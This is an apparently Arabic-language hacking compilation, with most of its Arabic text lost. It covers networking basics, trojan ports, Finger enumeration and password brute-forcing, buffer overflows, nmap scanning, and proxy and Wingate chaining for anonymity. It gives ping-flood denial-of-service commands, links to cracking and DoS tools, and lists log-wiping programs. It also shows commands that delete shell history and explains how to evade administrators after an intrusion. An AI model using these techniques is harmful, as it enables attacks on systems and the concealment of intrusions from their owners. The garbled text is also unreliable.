Webcrack
MungaBunga
WinSmurf
Evil Ping
DNS
Routing in the Internet
NETBIOS
Finger
Net
secure shell
Buffer Overflows
CGI
HTTP Port
NeoTrace
IIS
UniCode
God Will
NOOP4
CgiScaner
Shadow Scan Security
.htaccess
FTP
FTP
SQL
SQL
PHP Shell
PHP Shell
PHP Shell
anmap
Cross Site Scripting
Chunked
vBulletin 2.2.0
vBulletin 2.2.9
phpbb 2.0.0
php nuke
CSS XSS Cross Site Scripte
XSS
XSS
) ( +
:
XSS+BUG+EXPLOIT
: IIS
IIS+exploit+bug
:
:
: http://www.google.com/
: http://www.yahoo.com/ - http://www.altavista.com/
- http://www.lycos.com/ - http://hotbot.lycos.com/
)) : )) kazaa WinMX
: http://news.bbc.co.uk/hi/arabic/news http://arabic.cnn.com/ - http://www.aljazeera.net/
: http://www.securiteam.com/ http://www.securityfocus.com/ - http://www.ussrback.com/ http://www.ntbugtraq.com/ - http://www.ntsecurity.nu/ http://www.ntsecurity.com/
: http://nvidia.com/ - http://www.asus.com/ - http://drivers.online.net.nz/ - http://intel.com/ - http://www.amdmb.com/
") ) "
IP
.
.
.IP
.
.
Start run .winipcfg
"" "" .winipcfg
IP
IP 212.33.40.1 24.5.66.3
IP 212
IP " "
IP IP
.
IANA (Internet Assigned Numbers Authority) IP
:
1- ARIN (American Registry for Internet Numbers)
2- RIPE (Réseaux IP Européens)
3- APNIC (Asia Pacific Network Information Center)
IP .
8
IP whois IP
IP IP
http://www.ripe.net/db/whois.html
IP .
IP
IP 10.10.10.1
0 ) 255 (
IP
IP
. IP 212.26.75.34 IP
212.26.75.201 .
IP ) IP (
IP whois .
http://www.ripe.net/db/whois.html
212.26.75 search
.
Port
.
web server ftp server.
80 21
1720 .
.
DNS
.
.DNS IP ..
CNN 207.145.53.10 www.cnn.com
..
DNS IP
DNS ) IP
( www.cnn.com
DNS
... DNS
IP .
netstat
IP .
. .
.connection
Client .server
)
( ) (port )
( netstat ms-dos prompt
programs
.
)IRC) Internet Relay Chat
chat server chat client
.
.
IP
IRC chat
server
IP
) ( XXX.111.222.333
IP
.
IP
,
:
.1
10
)
( IP .
.2 :
IP
.
)
( IP .
.
)
(
/www.networksolutions.com/cgi-bin/whois/whois
) www ( wagait.com
.
.
FTP 21
SMTP 25
Web 80
POP3 110
NetBIOS 139
Netmeeting 1720,1503
Chat 6667
NetBus 12345,20034
BackOrifice 31337
" ) ("
-1 ):(Viruses
.
) (
.
-2 ):(Trojans
) ( .
.
" " NetBus"
" Back Orifice " " . SubSeven
) (client
.
) (
) (CD-ROM
.
-3 :
.
. "
"
) (
.
"" )
(
.
-4 :
) ( encrypted .
) ( PWL
.
98 95
.
-5
!
.
! ICQ
.
.
.
IP
!
-6 -6 :
.
.
. ) (script
! 4
.
-7 :
FTP )
(SMTP
><JawaDal :
>:
<z3r0
here we G0
.. dos .shell account
. it reboots . ! . !!!
/FTP ftp://hostname:
GFI LANguard network security scanner
..21 .. ..
!!
log in ftp ...cd lcd dir ls :
log in LOGS...(LOG.FILES) 1
LOG
log files ) (loged in
:
online
IP Address >>>>>>>
) host name (
screen resolution
)>>>>(ISP
3 log files:
- WTMP \ \ host tty
- UTMP Onlne
- LASLOG \
!! ) (log.files )track you
... (down
: !
<-- <----FTP-- !
. !
..
<-- <-- <--...--so on--
!! ..
-: Wingate ..
Wingate .. Wingate
IP !!
1.. !
....
!! .. anonymous ..web
!!...... .spyware firewall . zone alarm
) .. (
!! windows washer
,. .. .
. how to Stay anonymous on the web how to
secure to secure my computer
.. ..
Preety Good Privacy (PGP)d ..
!
/http://www.pgpi.org :
ok !
.. ..
-1 wingate
!
tracks
: log modifier
ah-1_0b.tar clear.c cloak2.c invisible.c marryv11.c wzap.c wtmped.c
zap.c
==================================================
==========================================
. anonymous
. ..
!!!. .
" "
------------------------------------------------------- -1 .
-2 .
-3 .
-4 .ACL
-5 .
:
-1.
-3.
-3 .
-4.
.
.
:
-1 .
-2 .
-3 .
-4 National
.(Security Agency (NSA
-5
ROM Boot Chip
RAM .
-6 .
-7 Permissions
.
-8 Rights .
:
-1 .
-2 .
.
. .
.
Security
(Accounts Manager (SAM Workstation
Domain
SAM
Access Token
:
-1 (Security Identifier (SID .
-2 Group SIDs .
-3 Privileges .
Access Token
.Remote Logon
.
:
-1 .
-2 .
-3 .
-4 .No Access
.
(Access Control List (ACL
ACL .(Access Control Entry (ACE
ACE SID
ACE ACL ACE
SID .
: ACE
-1 .AccessAllowed
-2 AccessDenied .No Access
SID SIDs ACE
ACL.
NT 2000 ACE AccessDenied ACEs
AccessAllowed ACEs SID AccessDenied ACEs
AccessAllowed ACEs
SID .
:
:
.
:
-1 .
-2 .
" "
><BeReal :
===========================================================
==========
) -:(Telnet .
.
.
) (21
Anonymous Mode .
Start ==> Run ==> telnet .
------------------------------------------------------------------------
-:Scanner
) (Exploits
.
Shadow Security Scanner Stealth Omran Fast
Scanner .
IIS
CGI .
-----------------------------------------------------------------------
) -:(Exploits .
URL
. Buffer Over Flow Exploits
CGI Exploits CGI Bugs
Unicodes Exploits Buffer Over Flow Exploits
PHP Exploits DOS Exploits
. Fire Wall
). (c.
. ) (
Borland C++ Compiler .
----------------------------------------------------------------------
-:FireWall
.
) (
.
----------------------------------------------------------------------
-:Anonymouse
.
.
----------------------------------------------------------------------
-:Valnerableties
.
Valnerable (:
.
Security Focus .
----------------------------------------------------------------------
: passwd file
. .
--------------------------------------------------------------------- : root
.
.
--------------------------------------------------------------------- :Server
24
24 . (:
.
- . . -
---------------------------------------------------------------------- ) : ( Buffer over Flow
- -
.
- DOS -
.
" "
http://www.dunbell.freeserve.co.uk/webcrack40.zip
>< KING HAKER :
:
MUNGA BUNGA
:
-1
-2
-3
-4
-5 ) (
-6
:
1
2 BROWSE
3 BROWSE )
.....(
4
5 ) (
6
7
8
9
10
11 6
12
13 ) (
14
:
http://koti.mbnet.fi/hypnosis/caliberx/cracking.htm
..
winsmurf
Scree Shot
--------------------------------------------------------------
. 200
.
" "
, , :
, :
:
:
..
http://www.geocities.com/boom_q8y4/dorrah.zip
" "
...
::
"" ===<== :
Ping www.xx.com
:Xxx
.
:
) ( ) ( ) I-( ping -n
:
ping -n 1000 -l 400 www.xxx.com
::
...
:
ping -t ip
ip .
" "
2000
63
Telnet Authentication
You can use your local Windows 2000 user name and password or
domain account information to access the Telnet server. The security
scheme is integrated into Windows 2000 security. If you do not use the
NT LAN Manager (NTLM) authentication option, the user name and
password are sent to the Telnet server as plain text.
If you are using NTLM authentication, the client uses the Windows 2000 security
context for authentication and the user is not prompted for a user name
and password. The user name and password are encrypted.
NTLM
If the User Must Change Password At Next Logon option is set for a
user, the user cannot log on to the Telnet service when NTLM
authentication is used. The user must log on to the server directly and
change the password, and then log on through the Telnet client.
NTLM
In a Windows 2000 Server default installation, the Telnet service is set to
manual startup. You can use the Services snap-in or the Computer
Management snap-in to start, stop, or configure the Telnet service for
automatic startup.
Services
In the Computer Management snap-in, Telnet is a service located under
the Services and Applications node. Select Services from the console
tree, and then select Telnet from the list of services in the details pane.
You can also start or stop the Telnet service from a command prompt.
To start Telnet Server, type net start tlntsvr or net start telnet at the
command prompt, and then press Enter. To stop Telnet Server, type net
stop tlntsvr or net stop telnet at the command prompt, and then press
Enter.
Telnet Server Admin
You can use the Telnet Server Admin utility to start, stop, or get
information about Telnet Server. You can also use it to get a list of
current users, terminate a user's session, or change Telnet Server
registry settings.
Telnet Administration Tool , Telnet Server Admin
.OK ,tlntadmn ,Run ,Start Administrative Tools
.(Adminpak.msi) , Telnet Server Admin
Telnet Server Administration
Quit this
application
Terminate a user
session
Display/change
registry settings
Invalid input
. telnet .telnet ,Run ,Start ,Telnet
TCP/IP
To display help for Telnet, type help at the Microsoft Telnet command
prompt. To connect to a site, type open <computer_name> where
<computer_name> is the IP address or host name of the computer
running the Telnet service.
Hishem1 Hishem2
Hishem2 Hishem1 Hishem2
Hishem1
Hishem1 Administrator
, Start ,Programs Administrative Tools .Services
Services
.Telnet
(The Telnet Properties (Local Computer
Startup Type Manual .Automatic
,Service status . Start
OK )Local Computer) Telnet properties
. Services
Hishem1 Hishem2
, Start .Run
telnet .OK
help ?
open Hishem2
o open
Hishem2
Hishem2
Hishme2 Hishem1
, Start .Run
tlntadmn .OK
Telnet Server Admin
1
NOR IP
1 1
Hishem1
Start Run Telnet pop.mail.yahoo.com 110
user
user xxxx
pass pass xxxx
Ok
List
dele
pop
open [\\RemoteServer] [Port]
\\ RemoteServer
. .
Port
. .
.o
Redmond 44:
o redmond 44
Telnet
close [\\RemoteServer]
\\ RemoteServer
. .
.c
Redmond:
c redmond 44
Telnet
send [\\RemoteServer] [ao] [ayt] [esc] [ip] [synch] [?]
\\ RemoteServer
. .
ao
.
ayt
"."?Are you there
esc
.
ip
.
synch
.Telnet
Telnet
display
tlntadmn
Telnet
tlntadmn [\\RemoteServer] [start] [stop] [pause] [continue]
\\ RemoteServer
. .
start
.Telnet
stop
.Telnet
pause
.Telnet
continue
.Telnet
Telnet tlntadmn
2000 .2000
\\ RemoteServer
. .
maxconn=PositiveInteger
. 10
.
Telnet
tlntadmn [\\RemoteServer] config [maxfail=PositiveInteger]
\\ RemoteServer
. .
maxfail=PositiveInteger
.
.100
Telnet
tlntadmn [\\RemoteServer] config [timeout=hh:mm:ss]
\\ RemoteServer
. .
timeout=hh:mm:ss
.
? / ..
==============
DNS : . Domain Name System DNS
53 DNS
53 translates alphabetical hostnames
/http://www.burn.com : IP ADRESSES 127.0.0.1
address resolution IP
DNS . address resolution DNS
). (IP
address resolution DNS
HOST FILE
IP Stanford Research Institute's
.(Network Information Center (SRI-NIC
) (UPDATE
FTP .SRI-NIC
DNS .
DNS decentralized
DNS DNS
DNS
.
DNS
.
:THE DNS SERVER
================
DNS SERVER UNIX
BIND ) .(Berkeley Internet Name Domain
DNS SERVER . UNIX
DNS :
the name server itself (the daemon program that listens to port 53)
RESOLVER
NAME SERVER
/http://www.burn.com DNS )
( IP /http://www.burn.com
IP
.
daemon program
.
:THE TREE INFORMATION
======================
IP DNS
DNS SERVER
.DNS SERVERS
:
ISP isp.co.uk
ISP's DNS server's
hostname dns.isp.co.uk DNS IP
/http://www.burn.com dns.isp.co.uk
DNS
SERVER
dns.isp.co.uk some-organization.org.uk school.edu.uk,
university.ac.uk, england.gov.uk, airforce.mil.uk
UK
DNS ROOT IP
.DOMAIN NAME
?When and why does DNS "hang" or fail
======================================
DNS . ISP IP
.
DNS 15 .
address could not be found
HOST IP
DNS . TIMED OUT
REFRESH RELOAD .
SSL
.
ip .
ip
.
)inclusion of a
.(local network address or physical address within the frame
local networks .gateways
, routers
. ip routing
.
address translation
/http://www.burn.com ip
) DNS DNS (.
Physical Address :
:Physical Address Determination
===============================
ip data
.
physical address .
ip , physical addresses ip
.
ip physical addresses ARP
Address Resolution Protocol
ip , physical addresses ARP
. cache
arp -a .
:
C:\WINDOWS>arp -a
Interface: 62.135.9.102 on Interface 0x2
  Internet Address      Physical Address      Type
  207.46.226.17         20-53-52-43-00-00     dynamic
  213.131.64.2          20-53-52-43-00-00     dynamic
  213.131.65.238        20-53-52-43-00-00     dynamic
Physical Address
Physical Address Mac Address
Physical Address
ip Physical Address
router .
type dynamic
.
SNMP
NetBIOS
NetBIOS API 139 TCP
NT
NetBIOS TCP/IP
Advanced WINS
RestrictAnonymous
Administrative TOOLS Local Security
policy Local poicies security options Additional restrictions
for anonymous connections security No Access
Without Explicit Anonymous Permissions
NetBIOS
Net View
NT/W2000
IP
Net
.
Nbtscan
...
...
Legion
regedit
HKEY_LOCAL_MACHINE\system\currentControlset\serveces\SNMP\parameters\ExtensionAgent
=
LANManagerMIB2Agent
2
TCP/IP NetBIOS
" "Finger
> <
><LAMeR :
Finger 79
>================<
1.1
1.2 Finger
1.3 Finger
1.4 Finger
1.5 Finger
1.6
1.7
1.1:
>=========<
.
1.2 Finger
>===================<
Finger 79
businesscard .
) ( remote user Finger
) Finger (79 .
.
, ) (admin
.
Finger
. Finger
.
Finger
) ( Finger Deamon " " !Finger me " ! "
Finger
) (bisinesscard
Finger Deamon
) ( .
.
portscans . . .
Finger
.
Finger
: Finger
.
:) ( server
1.3 Finger
>=================<
) ( superscan
) ( /http://www.foobar.com ) Port( 79
/http://www.foobar.com
Finger .
) (request
) (client Finger ) ( installed
Telnet Finger
---Telnet(client) --------request-------> Finger Deamon(in Server) o
): ( MS DOS
telnet http://www.foobar.com/ 79
telnet .
)(client Finger
Deamon
.
:::
"@" " "www
:
finger@anyname.com
:
/finger http://www.anyname.com
finger www
) : ( unix shell
finger@foobar.com
) (
/http://www.foobar.com
:
Login: Name: Tty: Idle: When: Where
root foobar sys console 17d Tue 10:13 node0ls3.foobar.com
Amos Amanda <.......> <.......> <.......>
Anderson Kenneth
Bright Adrian
Doe John
Johnson Peter <.......> <.......> <.......>
Mitnick Kevin
Munson Greg
Orwell Dennis
) ( login )" (Name "
.
)(Tty the terminal type
) (Idle .the idle time
.
..
) Johnson Peter
( :
finger johnson@foobar.com
1.4 Finger
> =========================
===========<
.Finger
Finger deamon .
) ( % 50
/ )(Access .
bruteforce
worldist password cracker
/http://www.thehackerschoice.com
VLAD's pwscan.pl
) word (
- bruteforce
-
.
) (Admin ) (root
. .
.
:
finger secret@foobar.com
Finger Deamon
" "secret .
" "test " "temp ""0000
" "secret
.
finger .@foobar.com
finger 0@foobar.com
!
Finger Deamon RFC !
1.5 Finger
> =========================
=============<
) Finger Finger "" ""(
""www.victim.com
" "www.host.com Finger
): (
finger@host.com@victim.com
Host.com ) (Finger victim.com .
victim.com
/http://www.victim.com
) (log /http://www.host.com .
) Host( ) ( Finger
Finger
Finger .
:
!.
1.6
>=======================<
Finger Deamon
) ( access .
Finger deamon
.access
wordlist .bruteforce
" " .Finger deamon
> <
.net
net :
net ? net /
.
net
net help command .
net accounts :
net help accounts
net ) /y( ) /n( .
net stop server
net stop server /y
.
) .("Service Name " net
:logon
"net start "net logon
)*(.
) .(Sales\Ralphr
::
SSh
===============
secure shell )(
remotely connection
)rlogin,rsh and
.(rcp
secure shell tcp .
:: ::
secure shell r- commands
==================================================
======================================
======================
* BSD r- commands )
(rlogin,rsh and rcp
) (root access
unauthorized access to systems
:
(
ssh
. authorized access to systems
secure shell
) (
::
ssh
===========================================
-1 ip spoofing
ssh
ssh . localy
-2 DNS spoofing
-3
-4
ssh
ssh disconnected
.
ssh )three-key triple-DES, DES, RC4-128,
(TSS, Blowfish
" encryption of type "none !
ssh ,
ip spoofing DNS spoofing
.
.
:
-1 Buffer Overflow
<--------------------------
-2)(Proccess
<-----------------
-3 )(Memory management
<--------------------------------
-4 Buffer Overflow
<----------------------------------
*
-1 Buffer Overflow
<>-----------------------
Buffer Overflow .
Buffer Overflow ' 'code red
IIS - MS web server-
Buffer Overflow ) 20
.
(
:
" : " :
) ( .
15
) ( 25 )
(.
15 " "Overflow
.
:
<var1><var2><vname><Other things in memory>
10b 6b 15b
(var1 var2 vname, 15)
"abcabcabcabcabcabcabcabcabc":
somevalue2avalusabcabcabcabcabcabcabcabcabc
<var1><var2><vname><other things go here>
" vname "overflowed
.
" "Multi- proccesses ...
) (CPU
.. (:
.
:
-3 ):(Memory management
<>------------------------------
-operating systems- )virtual memory(.
) ( .
Operating System "
)(" .
) OS (
.
)(
) (
) (
.
.:
) (
) (
) (
)( .
-4 Buffer Overflow
<>---------------------------------
) (Root
)(
) (overflow
.
: )( )
(
)( .
Buffer Overflows Buffer Overflows
.
Buffer Overflow
.
) (1 CGI
TCP/IP .
) 80 (
-1
-2
GET -1
POST -2
PUT -3
) (2
HTTP
. FTP .TELNET
" !"
> <
> :<
:
==========
..
..
..
..
.. .. ..
log files
.. ! !!
..
************************
) ( exploites
" "
) ( 0day ..
!!
!!
!!
..
hacker
..
************************
8 :
=================
: ) (
: **" " Paranoid
:
" " Paraniod " " Paranoid !** ..
.
: )
(
LoGs : ) (
lOGs .. syslog configuration and logfile Admins checksum checking software :
:
:
: ........ !!! ...
************************
:
=======
:*************
.. ..
) ( Hacker ..
) (
" " Paranoid***************************
" " Paranoia )
(
..
paraniod :
!!
.. ..
..
!!
.. .. ... .. ..
) (
.. !!
!
.. )
( .. .. ..
!!
..
log
hacker .. % 100
" " Paranoid*********************
" " Paranoid
...
) (
... ..
..
.. ) (
..
!
!******************************************
..
: !!!!
:=========
******
..
:***********
SysAdmin ..
(= hacker
.. ..
) (
>--
<- sensitive data
..
:
MsDos SFS v.17 SecureDrive 1.4b *Amiga * ) EnigmaII v1.5 (
Unix CFS v1.33 ) ( ) ( :
Triple DES IDEA (Blowfish (32 rounds file2file :
:
===================
\\\ :
..
telnet security .. !!!! .. ==< >----
: LoGS
============
3 :
WTMP ) ( log on/off - log in/logout + tty + host UTMP ! LASTLOG logins** ) (
telnet , ftp , rlogin ..
:
!! .. % 99.9 ) .. (
logfiles
.. ..
..
:
ZAP (or ZAP2
..
root ) log files (
) default (
UTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
WTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
LASTLOG : /usr/var/adm or /usr/adm or /var/adm or /var/log
$home/.lastlog
:
=======
.. !!!
tmp and $HOME/
Shell History $HOME :
: History files
sh : .sh_history
csh : .history
ksh : .sh_history
bash: .bash_history
zsh : .history
: Backup Files
~* ,dead.letter, *.bak
: History files
mv .logout save.1
echo rm -rf .history>.logout
echo rm -rf .logout>>.logout
echo mv save.1 .logout>>.logout
======================
encrypted partition
) (
admin
..
..
.. shells
background !!!
parametres ...
telnet http://www.host.com/ 23 :
telnet
open
/http://www.host.com
..
backdoors )
sub7 (
:
===============================
*******
sniffer ..
:
**********************
) ( hacker ...
!!!
...
* ) ( ) ( admin
) (
output sniffer
netstat online
!! GateWay Server
* A gateway server in between
wtmp and lastlogs
gateway server
..
.. gateway server
..
==< ) root access (
Dialup server ..
(= hacked system
: dialup hacking
server
) ( )
( dialup servers !
:
lOGs ..**************************************************
***
..
:
- 1 : LSOF List Open
Files
- 2 ) ( -
touch /tmp/check ""find / -newer /tmp/check -print
: <- <- <-
log files /usr/adm /var/adm /var/log
loghost xx@loghost ..
loghost
logfiles text editor
wc 10 "head -LineNumbersMinus10" :
) 10( head -
accouting acct-cleaner from
zhart
wtmpx utmpx !!!
.. ) ( =(
syslog configuration and logfile************************************
syslog function ..
syslog
logs hosts ...
hosts
syslog /etc/syslog.conf
******************************
.
cron /var/spool/cron/crontabs
. Root .
"."crontab -l root
. ~/bin
. sinnefer .
,tiger, cops, spi, tripwire, l5
.binaudit, hobgoblin, s3 etc
,
, :
) (
back door Admins****************************
, .
:
forword. alias sulog su root group ) admin, root,wheel, etc
passwd , . ) ,
chid.c, changeid.c ( .
history/.sh_history/.bash_history ,
, . .
profile/.login/.bash_profile alias ,
. ,
checksum checking software
************************
) checksum .
(
checksum
:
=========
***************************
) ( administrators
) (
: administrators hacker ==< ...
) admins hacker
administrator administrator (
..
..
..
..
) ( ..
..
..
:
=========
:
**************************************************
**************
: !!!! : ..
..
) (
..
: !!! :
.. ..
) (
..
!
:
========
:
******************************
Change - Changes fields of the logfile to anything you want
Delete - Deletes, cuts out the entries you want
Edit - real Editor for the logfile
.Overwrite - just Overwrites the entries with zero-value bytes
!Don't use such software (f.e. zap) - it can be detected
--------------------------------------------------------------LOG MODIFIER
++++++++++
ah-1_0b.tar Changes the entries of accounting information
clear.c Deletes entries in utmp, wtmp, lastlog and wtmpx
cloak2.c Changes the entries in utmp, wtmp and lastlog
invisible.c Overwrites utmp, wtmp and lastlog with predefines values, so
! it's better than zap. Watch out, there are numerous inv*.c
!marryv11.c Edit utmp, wtmp, lastlog and accounting data - best
wzap.c Deletes entries in wtmp
wtmped.c Deletes entries in wtmp
!zap.c Overwrites utmp, wtmp, lastlog - Don't use! Can be detected
------------------------------------------------------------------------------------- :
=========
**********
.. .. !!
) (
..
" ) ( "
++++++++++++++++++++++++++++++++++
Introduction to Proxy Server
=) proxy server: (=
) proxy server ( server
proxy server
LAN:
Local Area Network
proxy server
proxy server
/http://hackergurus.tk
proxy server proxy server
/http://hackergurus.tk
server
:...
bit )(
proxey server
lucky
!
proxy server
download #..
10
proxy server
Refresh Reload
Why use a Proxy Server
=) (=
!!!
:
ISP
Internet Service Provider
Traffic
proxy server
ip
ip
proxy port proxy server
!! (..
cach.microsoft.com 80
-1
-2
-3
Logs
Introduction to Wingate
=) =(Wingate
WinGate
proxy server firewall
) Anonymously (
WinGate :
------------------------------------------------------------------------------------------
dial up modem, ISDN, xDSL, cable modem, satellite connection, or even
dedicated T1 circuits
------------------------------------------------------------------------------------------
wingate
, 23
. Telnet
the wingate .
wingate ) Aminstrator(
wingate ,
) Local Network (
ipspoof ICQ - Mirc .
wingate open wingates
) Admin( DIScover
!!!
WinGate
WinGate SyGate
) Logs( WinGate Server 48
) ISP's (
wingate
How do I find Wingates
=) WinGate(=
. wingate
.
WinGate Scanner
google
/http://www.google.com
ip hostname
@home
:
wingates wingate NetWork
...
Unix :
Trial and Error
wingate 23
) Guest( Anonymously
Introduction to Socks Host
=) =(Socks Host
Socks Host WinGate 1080
explorer and netscape
Socks Host
Mirc ip FireWall
**********************
**********************
Ghost Surf
$$$$$$$$$$$$$$$$$$$$$$
Stealther
------------------------------------------
------------------------------------------- %100
" ) ( "
...
Chaining Proxies
/http://www.proxytester.com
Ip !!!
..
=========================
*************************************
&&&&&&&&&&&&&&
proxy server
&&&&&&&&&&&&&&
Proxy (WebSite,IRC Chat,etc):
Proxy Server
...
][User]>>>>>[Proxy]>>>>>[Web Pages
---------------Proxy Chaining
---------------
/
][User]>>>[Proxy1]>>>[Proxy2]>>>[Proxy3]>>>[Proxy4]>>>[Destination
Destination = web page, Unix server, ftp server, etc
Proxy chaining
server telnet, ftp, or http
Chaining %100
ftp
Adminstrator Logs proxy
Chaining Proxy
Logs
Logs ...
---------------HTTP Chaining
--------------- HTTP chaining Proxy Address
:
http://proxy.magusnet.com/-_-http://www.google.com
) (-_- !!!
Chaining:
_http://proxy.server1.com/-_-http://proxy.server2.com/-http://www.destination.com
http://anon.free.anonymizer.com/http://www.google.com
) (/
http://proxy1/http://proxy2:80/proxy3:80/http://www.yahoo.com
= proxy .....
---------------Browser Chaining
--------------- Internet Explorer
----
213.234.124.23:80
213.234.124.23:
80:
ISP
Tools
Internet Options
Connections
Settings
) Address(
) Port(
213.234.124.23: 80:
Chaining Proixes
/
Address: 213.234.124.23:80 121.172.148.23:80 143.134.54.67 Port: 80
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
&&&&&&&&&&&&&&
Wingates
&&&&&&&&&&&&&&
Wingate proxy server
)) 23 Telnet ((
Wingates online
Admin
wingate !!!!
ip 23 Telnet
WinScan
Wingate
Download
------------------------------Chaining Wingates Using Telnet
------------------------------ Wingate
DoS Telnet .....
wingate 23
Telnet
61.133.119.130 23
Telnet:
C:\WINDOWS>telnet 61.133.119.130 23
Wingate> 203.207.173.166 23
Wingate> 213.17.99.45 23
Wingate> 10.65.212.7 23
wingate
WinGate>arbornet.org
C:\Windows> telnet 61.133.119.130 23
Wingate>203.207.173.166 23
Wingate>135.245.18.167 23
Wingate>m-net.arbornet.org
Connecting to host arbornet.org...Connected
" "Logs
> <
> : <
.
. Unix Multi-User Mode .
. Operation ) ( Linux ) . ( Unix
Unix
:
.
....
: ( LOG File ) ...
: ... ....
IP
........
Microsoft
Windows Linux Mac
....
..
: ...
) . ( LOG File .
) (Web servers
) (log files .
.
) (log file
.
.
- -
:
...
...
. WIN NT
...
:
) ( ) (
...
... ..
...
. :
lastlogin.
.
.
bash_history.
contactemail.
Tmp trash. . etc
.
lastlogin & .bash_history.
rm bash_history.
:
rm .bash_history
rm .bash_history
lastlogin. .
....
cpanel .
..
localhost :
...
:
....
...
...
...
...
: ... ....
..
.. ) ( HTTP Protocol
HTTP .... . SOCKS Protocol
.
.
Web Proxy Service (1 . HTTP Protocol .
WinSock Proxy Service (2 windows NT
telnet FTP WinSock
...... Protocol
. Socks Proxy Service (3 )SSL) Secure Sockets
Layers ) IIS) Internet Information Server Windows NT
FTP Telnet GopherIRC RealAudio POP3
firewall ... securiy .
..... TCP/IP
:
* International Organization for Standardization
** Transmission Control Protocol (TCP)
... :
Ping Traceroute, DNS lookup, Finger, Whois, LDAP, SNMP
... WIN NT : TCP/IP
...
UNIX Router .
... .
) . ( Router : .
.
.... ... .
. ...
... . :
Port 21 = FTP
Port 23 = Telnet
Port 25 = SMTP
Port 53 = DNS
Port 79 = Finger
Port 80 = HTTP
Port 110 = POP3
Port 111 = SunRPC
Port 139 = NetBIOS
Port 443 = SSL
Port 1080 = SOCKS
Port 8181 = IMail
.
: ... HTTPort .
.
TCP/IP HTTPort
( ) Proxy Server
ISP
) ) Proxy .
HTTPort
.
SOCKS
...
( Anonymous)
: ... 18
AnalogX Proxy
HTTP (web), HTTPS (secure web), POP3 (receive mail),
SMTP (send mail), NNTP (newsgroups), FTP (file transfer), and
Socks4/4a and partial Socks5 (no UDP) protocols! It works great with
Internet Explorer, Netscape, AOL, AOL Instant Messenger, Microsoft
Messenger, and many more!
http://www.analogx.com/files/proxyi.exe
PortBlocker :
:
PortBlocker is configured to block the most common types of servers
that might be on a system (FTP, HTTP, etc), so will not require any
modification for most users. If you are running a special server of some
sort, then you can easily add its ports (either TCP or UDP) to its list,
and have them blocked and/or logged.
Log unauthorized port access attempts and secure internal servers from
internet access easily...
PortBlocker
http://www.analogx.com/files/pblocki.exe
.
...
...
...
Proxy Log Analyzer :
:
MB 1.07 :
http://www.mechanicalminds.com/software/pla/setup.exe
ZIP archive instructions 818 kb
http://www.mechanicalminds.com/software/pla/pla.zip
.
Provides a space for you to type the address and port number of the
proxy server you want to use to gain access to the Internet over HTTP,
Secure, FTP, Gopher, and Socks protocols.
.
... .
Port mapping
Add
New mapping
Local port : 80
Remote host : webcache.bt.net
Remote port : 3128
OKY MAN
Proxy
,,,
Start
127.0.0.1
80
..
" "
:
=) (=
^^^^^^^^^^^^^^^^^^^
/http://www.netcraft.com
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
/http://www.almodammer.com
dfl;kjgk'dgjbumpipt@almodammer.com
Headers
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
Banners
..
Telnet Client
FTP 21
TELNET 23
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
HTTP
Hyper Text Transfer Protocol
8080 - 80
80 Telnet
GET /qwe HTTP/1.1
400
:
HEAD 127.0.0.1 HTTP/1.1
...
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
ping ip
!
ping ipsite
=ipsite
TTL=XXX
=XXX
:
OS               Platform       TTL
Windows 9x/NT    Intel          32
Windows 9x/NT    Intel          128
Windows 2000     Intel          128
DigitalUnix 4.0  Alpha          60
Unisys x         Mainframe      64
Linux 2.2.x      Intel          64
FTX(UNIX) 3.3    STRATUS        64
SCO R5           Compaq         64
Netware 4.11     Intel          128
AIX 4.3.x        IBM/RS6000     60
AIX 4.2.x        IBM/RS6000     60
Cisco 11.2       7507           60
Cisco 12.0       2514           255
IRIX 6.x         SGI            60
FreeBSD 3.x      Intel          64
OpenBSD 2.x      Intel          64
Solaris 8        Intel/Sparc    64
Solaris 2.x      Intel/Sparc    255
: ) data list or packet ( Nodes TTL 1
tracert traceroute
tracert ip
=ip
^^^^^^^^^^^^^^^^^^^
=) (=
^^^^^^^^^^^^^^^^^^^
Windows
:
) N-Stealth ...(
=============
( Shadow Sceurity Scanner
(
=============
( SuperScan
( List
------------------------------------------------------------------------Linux
Nmap
( ) Network Maper
Linux
//
:
/ nmap
Nmap V. 3.00 Usage: nmap [Scan Type(s)] [Options] <host or net list>
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
  -sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
  -sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
  -sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
  -p <range> ports to scan. Example range: '1-1024,1080,6666,31337'
  -F Only scans ports listed in nmap-services
  -v Verbose. Its use is recommended. Use twice for greater effect.
  -P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
  -T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy
  -n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
  -oN/-oX/-oG <logfile> Output normal/XML/grepable scan logs to <logfile>
  -iL <inputfile> Get targets from file; Use '-' for stdin
* -S <your_IP>/-e <devicename> Specify source address or network interface
  --interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES
!!!!!!!!!
.. man page
nmap -sS -O -vv almodammer.com
= almodammer.com
.......
^^^^^^^^^^^^^^^^^^^
=(=(
^^^^^^^^^^^^^^^^^^^
Linux Shell Account
Linux Shell
Linux
whois
Linux
man whois
------------------------------------------------------------------ google
http://www.google.com/search?q=whois&btnG=Google+Search
cgi
netcraft ..............
" "
>>P @ LH@CKERZ :
1
//:http
:
\
/http://www.XXX.com
/
2
3
4
5
6
7
8
9
10
11
11 10 :
12
:
.
" ) ( "
><
><sNiper_hEx :
) 13 ( -:
.
.
.
.
. CMD
.
. ECHO
CMD
.
Access Denied . . FTP
.
. TFTP
.
-
.
